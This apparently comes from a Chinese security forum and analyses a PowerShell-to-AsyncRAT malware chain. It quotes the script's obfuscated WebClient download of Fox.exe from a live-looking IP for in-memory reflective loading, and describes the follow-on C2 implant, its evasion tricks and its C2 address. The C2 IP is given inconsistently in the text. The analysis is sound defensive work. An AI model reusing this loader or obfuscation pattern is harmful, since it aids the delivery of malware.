技术社区
安全培训
技术社群
积分商城
先知平台
漏洞库
历史记录
清空历史记录
相关的动态
相关的文章
相关的用户
相关的圈子
相关的话题
注册
登录
恶意程序分析:基于PowerShell的恶意软件攻击链与AsyncRAT关联活动
Ba1_Ma0
二进制安全
119浏览 · 2025-03-26 05:23
返回文档
powershell脚本分析
捕获到的恶意程序为PowerShell脚本文件,其内容如下:
图片加载失败
1.ps脚本首先创建WebClient对象$dguetBWq0K = New-Object System.Net.WebClient,用于下载文件的WebClient实例
2.解码混淆的URL$WawglCJmeM = "svPs2hsvPs2tsvPs2tsvPs2psvPs2://svPs29svPs22svPs2.svPs22svPs25svPs25svPs2.svPs28svPs25svPs2.svPs22svPs2/svPs2FsvPs2osvPs2xsvPs2.svPs2esvPs2xsvPs2esvPs2".Replace("svPs2", "")替换所有svPs2为空字符串后,URL解析为:http://92.225.85.2/Fox.exe
3.下载恶意负载$R9u3at = $dguetBWq0K.DownloadData($WawglCJmeM)从上述URL下载二进制数据(Fox.exe)
4.加载并执行程序集
该恶意程序将下载的二进制数据作为.NET程序集动态加载到内存中,并通过反射机制执行。
fox.exe
恶意程序fox.exe使用PDF文档图标进行伪装(扩展名与图标不匹配),诱导用户误判为无害文件,后续攻击者可能通过钓鱼邮件或伪装下载链接传播该文件,利用社会工程学手段诱骗执行
使用Detect It Easy (DIE) 工具分析,检测到以下特征:
图片加载失败
该程序是一个.net的32位程序,使用dnSpy进行静态分析
图片加载失败
图片加载失败
fox.exe采用多层混淆(控制流+字符串加密+类型随机化)
图片加载失败
图片加载失败
该程序通过WebClient类从指定URL异步下载数据包。在此过程中,使用Wireshark网络协议分析工具对目标IP地址92.225.85.2的网络流量进行了实时监控和数据包捕获
图片加载失败
fox.exe 进程通过 HTTP/HTTPS 从远程服务器 92.225.85.2 下载并存储了名为 k.exe 的可执行文件
k.exe
使用Detect It Easy (DIE) 工具分析,检测到以下特征:
图片加载失败
2025年3月25日编译的程序,该程序是一个.net的32位程序,使用dnSpy进行静态分析
图片加载失败
该程序是一个典型的恶意软件主控模块,通过AES解密动态加载C2服务器配置(如IP、端口、密钥),启动后延迟3秒运行以规避沙箱检测。其核心功能包括:1)创建互斥锁确保单实例运行;2)阻止系统休眠维持持久化;3)启动双线程——监控用户活动识别真实环境,以及维持C2心跳连接(随机3-10秒间隔)并支持断线重连。程序采用无文件攻击技术,所有配置均加密存储,通过内存加载恶意载荷,具有高度隐蔽性
使用Wireshark网络协议分析工具对目标IP地址92.225.85.2的网络流量进行了实时监控和数据包捕获
图片加载失败
图片加载失败
恶意程序 k.exe 通过 TCP 协议与远程主机 92.255.85.2 的 4372 端口建立连接,并进行了网络通信
图片加载失败
总结
该恶意攻击始于一个混淆的PowerShell脚本,通过WebClient下载并加载恶意程序Fox.exe。脚本采用字符串混淆(如svPs2),解码后获取真实URL(http://92.225.85.2/Fox.exe),并利用.NET反射机制在内存中执行,规避文件检测。Fox.exe伪装成PDF文档图标,采用多层混淆(控制流、字符串加密),功能包括:延迟3秒启动(绕过沙箱)、AES解密配置、创建互斥锁(确保单实例运行)、阻止系统休眠(维持持久化),并通过双线程监控用户活动及维持C2通信(心跳间隔3-10秒)。网络分析显示,恶意软件与C2服务器(92.255.85.2:4372,俄罗斯IP)建立TCP连接,传输加密数据。威胁情报表明该IP关联AsyncRAT、垃圾邮件及250个恶意C段IP
图片加载失败
0
人收藏
0
人喜欢
转载
分享
0
条评论
某人
表情
可输入
255
字
评论
没有评论
发布投稿
热门文章
1
从零掌握java内存马大全(基于LearnJavaMemshellFromZero复现重组)
2
突破网络限制,Merlin Agent助你轻松搭建跳板网络!
3
从白帽角度浅谈SRC业务威胁情报挖掘与实战
4
基于规则的流量加解密工具-CloudX
5
从0到1大模型MCP自动化漏洞挖掘实践
近期热点
一周
月份
季度
1
从零掌握java内存马大全(基于LearnJavaMemshellFromZero复现重组)
2
突破网络限制,Merlin Agent助你轻松搭建跳板网络!
3
从白帽角度浅谈SRC业务威胁情报挖掘与实战
4
基于规则的流量加解密工具-CloudX
5
从0到1大模型MCP自动化漏洞挖掘实践
暂无相关信息
暂无相关信息
优秀作者
1
T0daySeeker
贡献值:38700
2
一天
贡献值:24800
3
Yale
贡献值:18000
4
1674701160110592
贡献值:18000
5
1174735059082055
贡献值:16000
6
Loora1N
贡献值:13000
7
bkbqwq
贡献值:12800
8
手术刀
贡献值:11000
9
lufei
贡献值:11000
10
xsran
贡献值:10600
目录
powershell脚本分析
fox.exe
k.exe
总结
转载
标题
作者:
你好
http://www.a.com/asdsabdas
文章
转载
自
复制到剪贴板
没有评论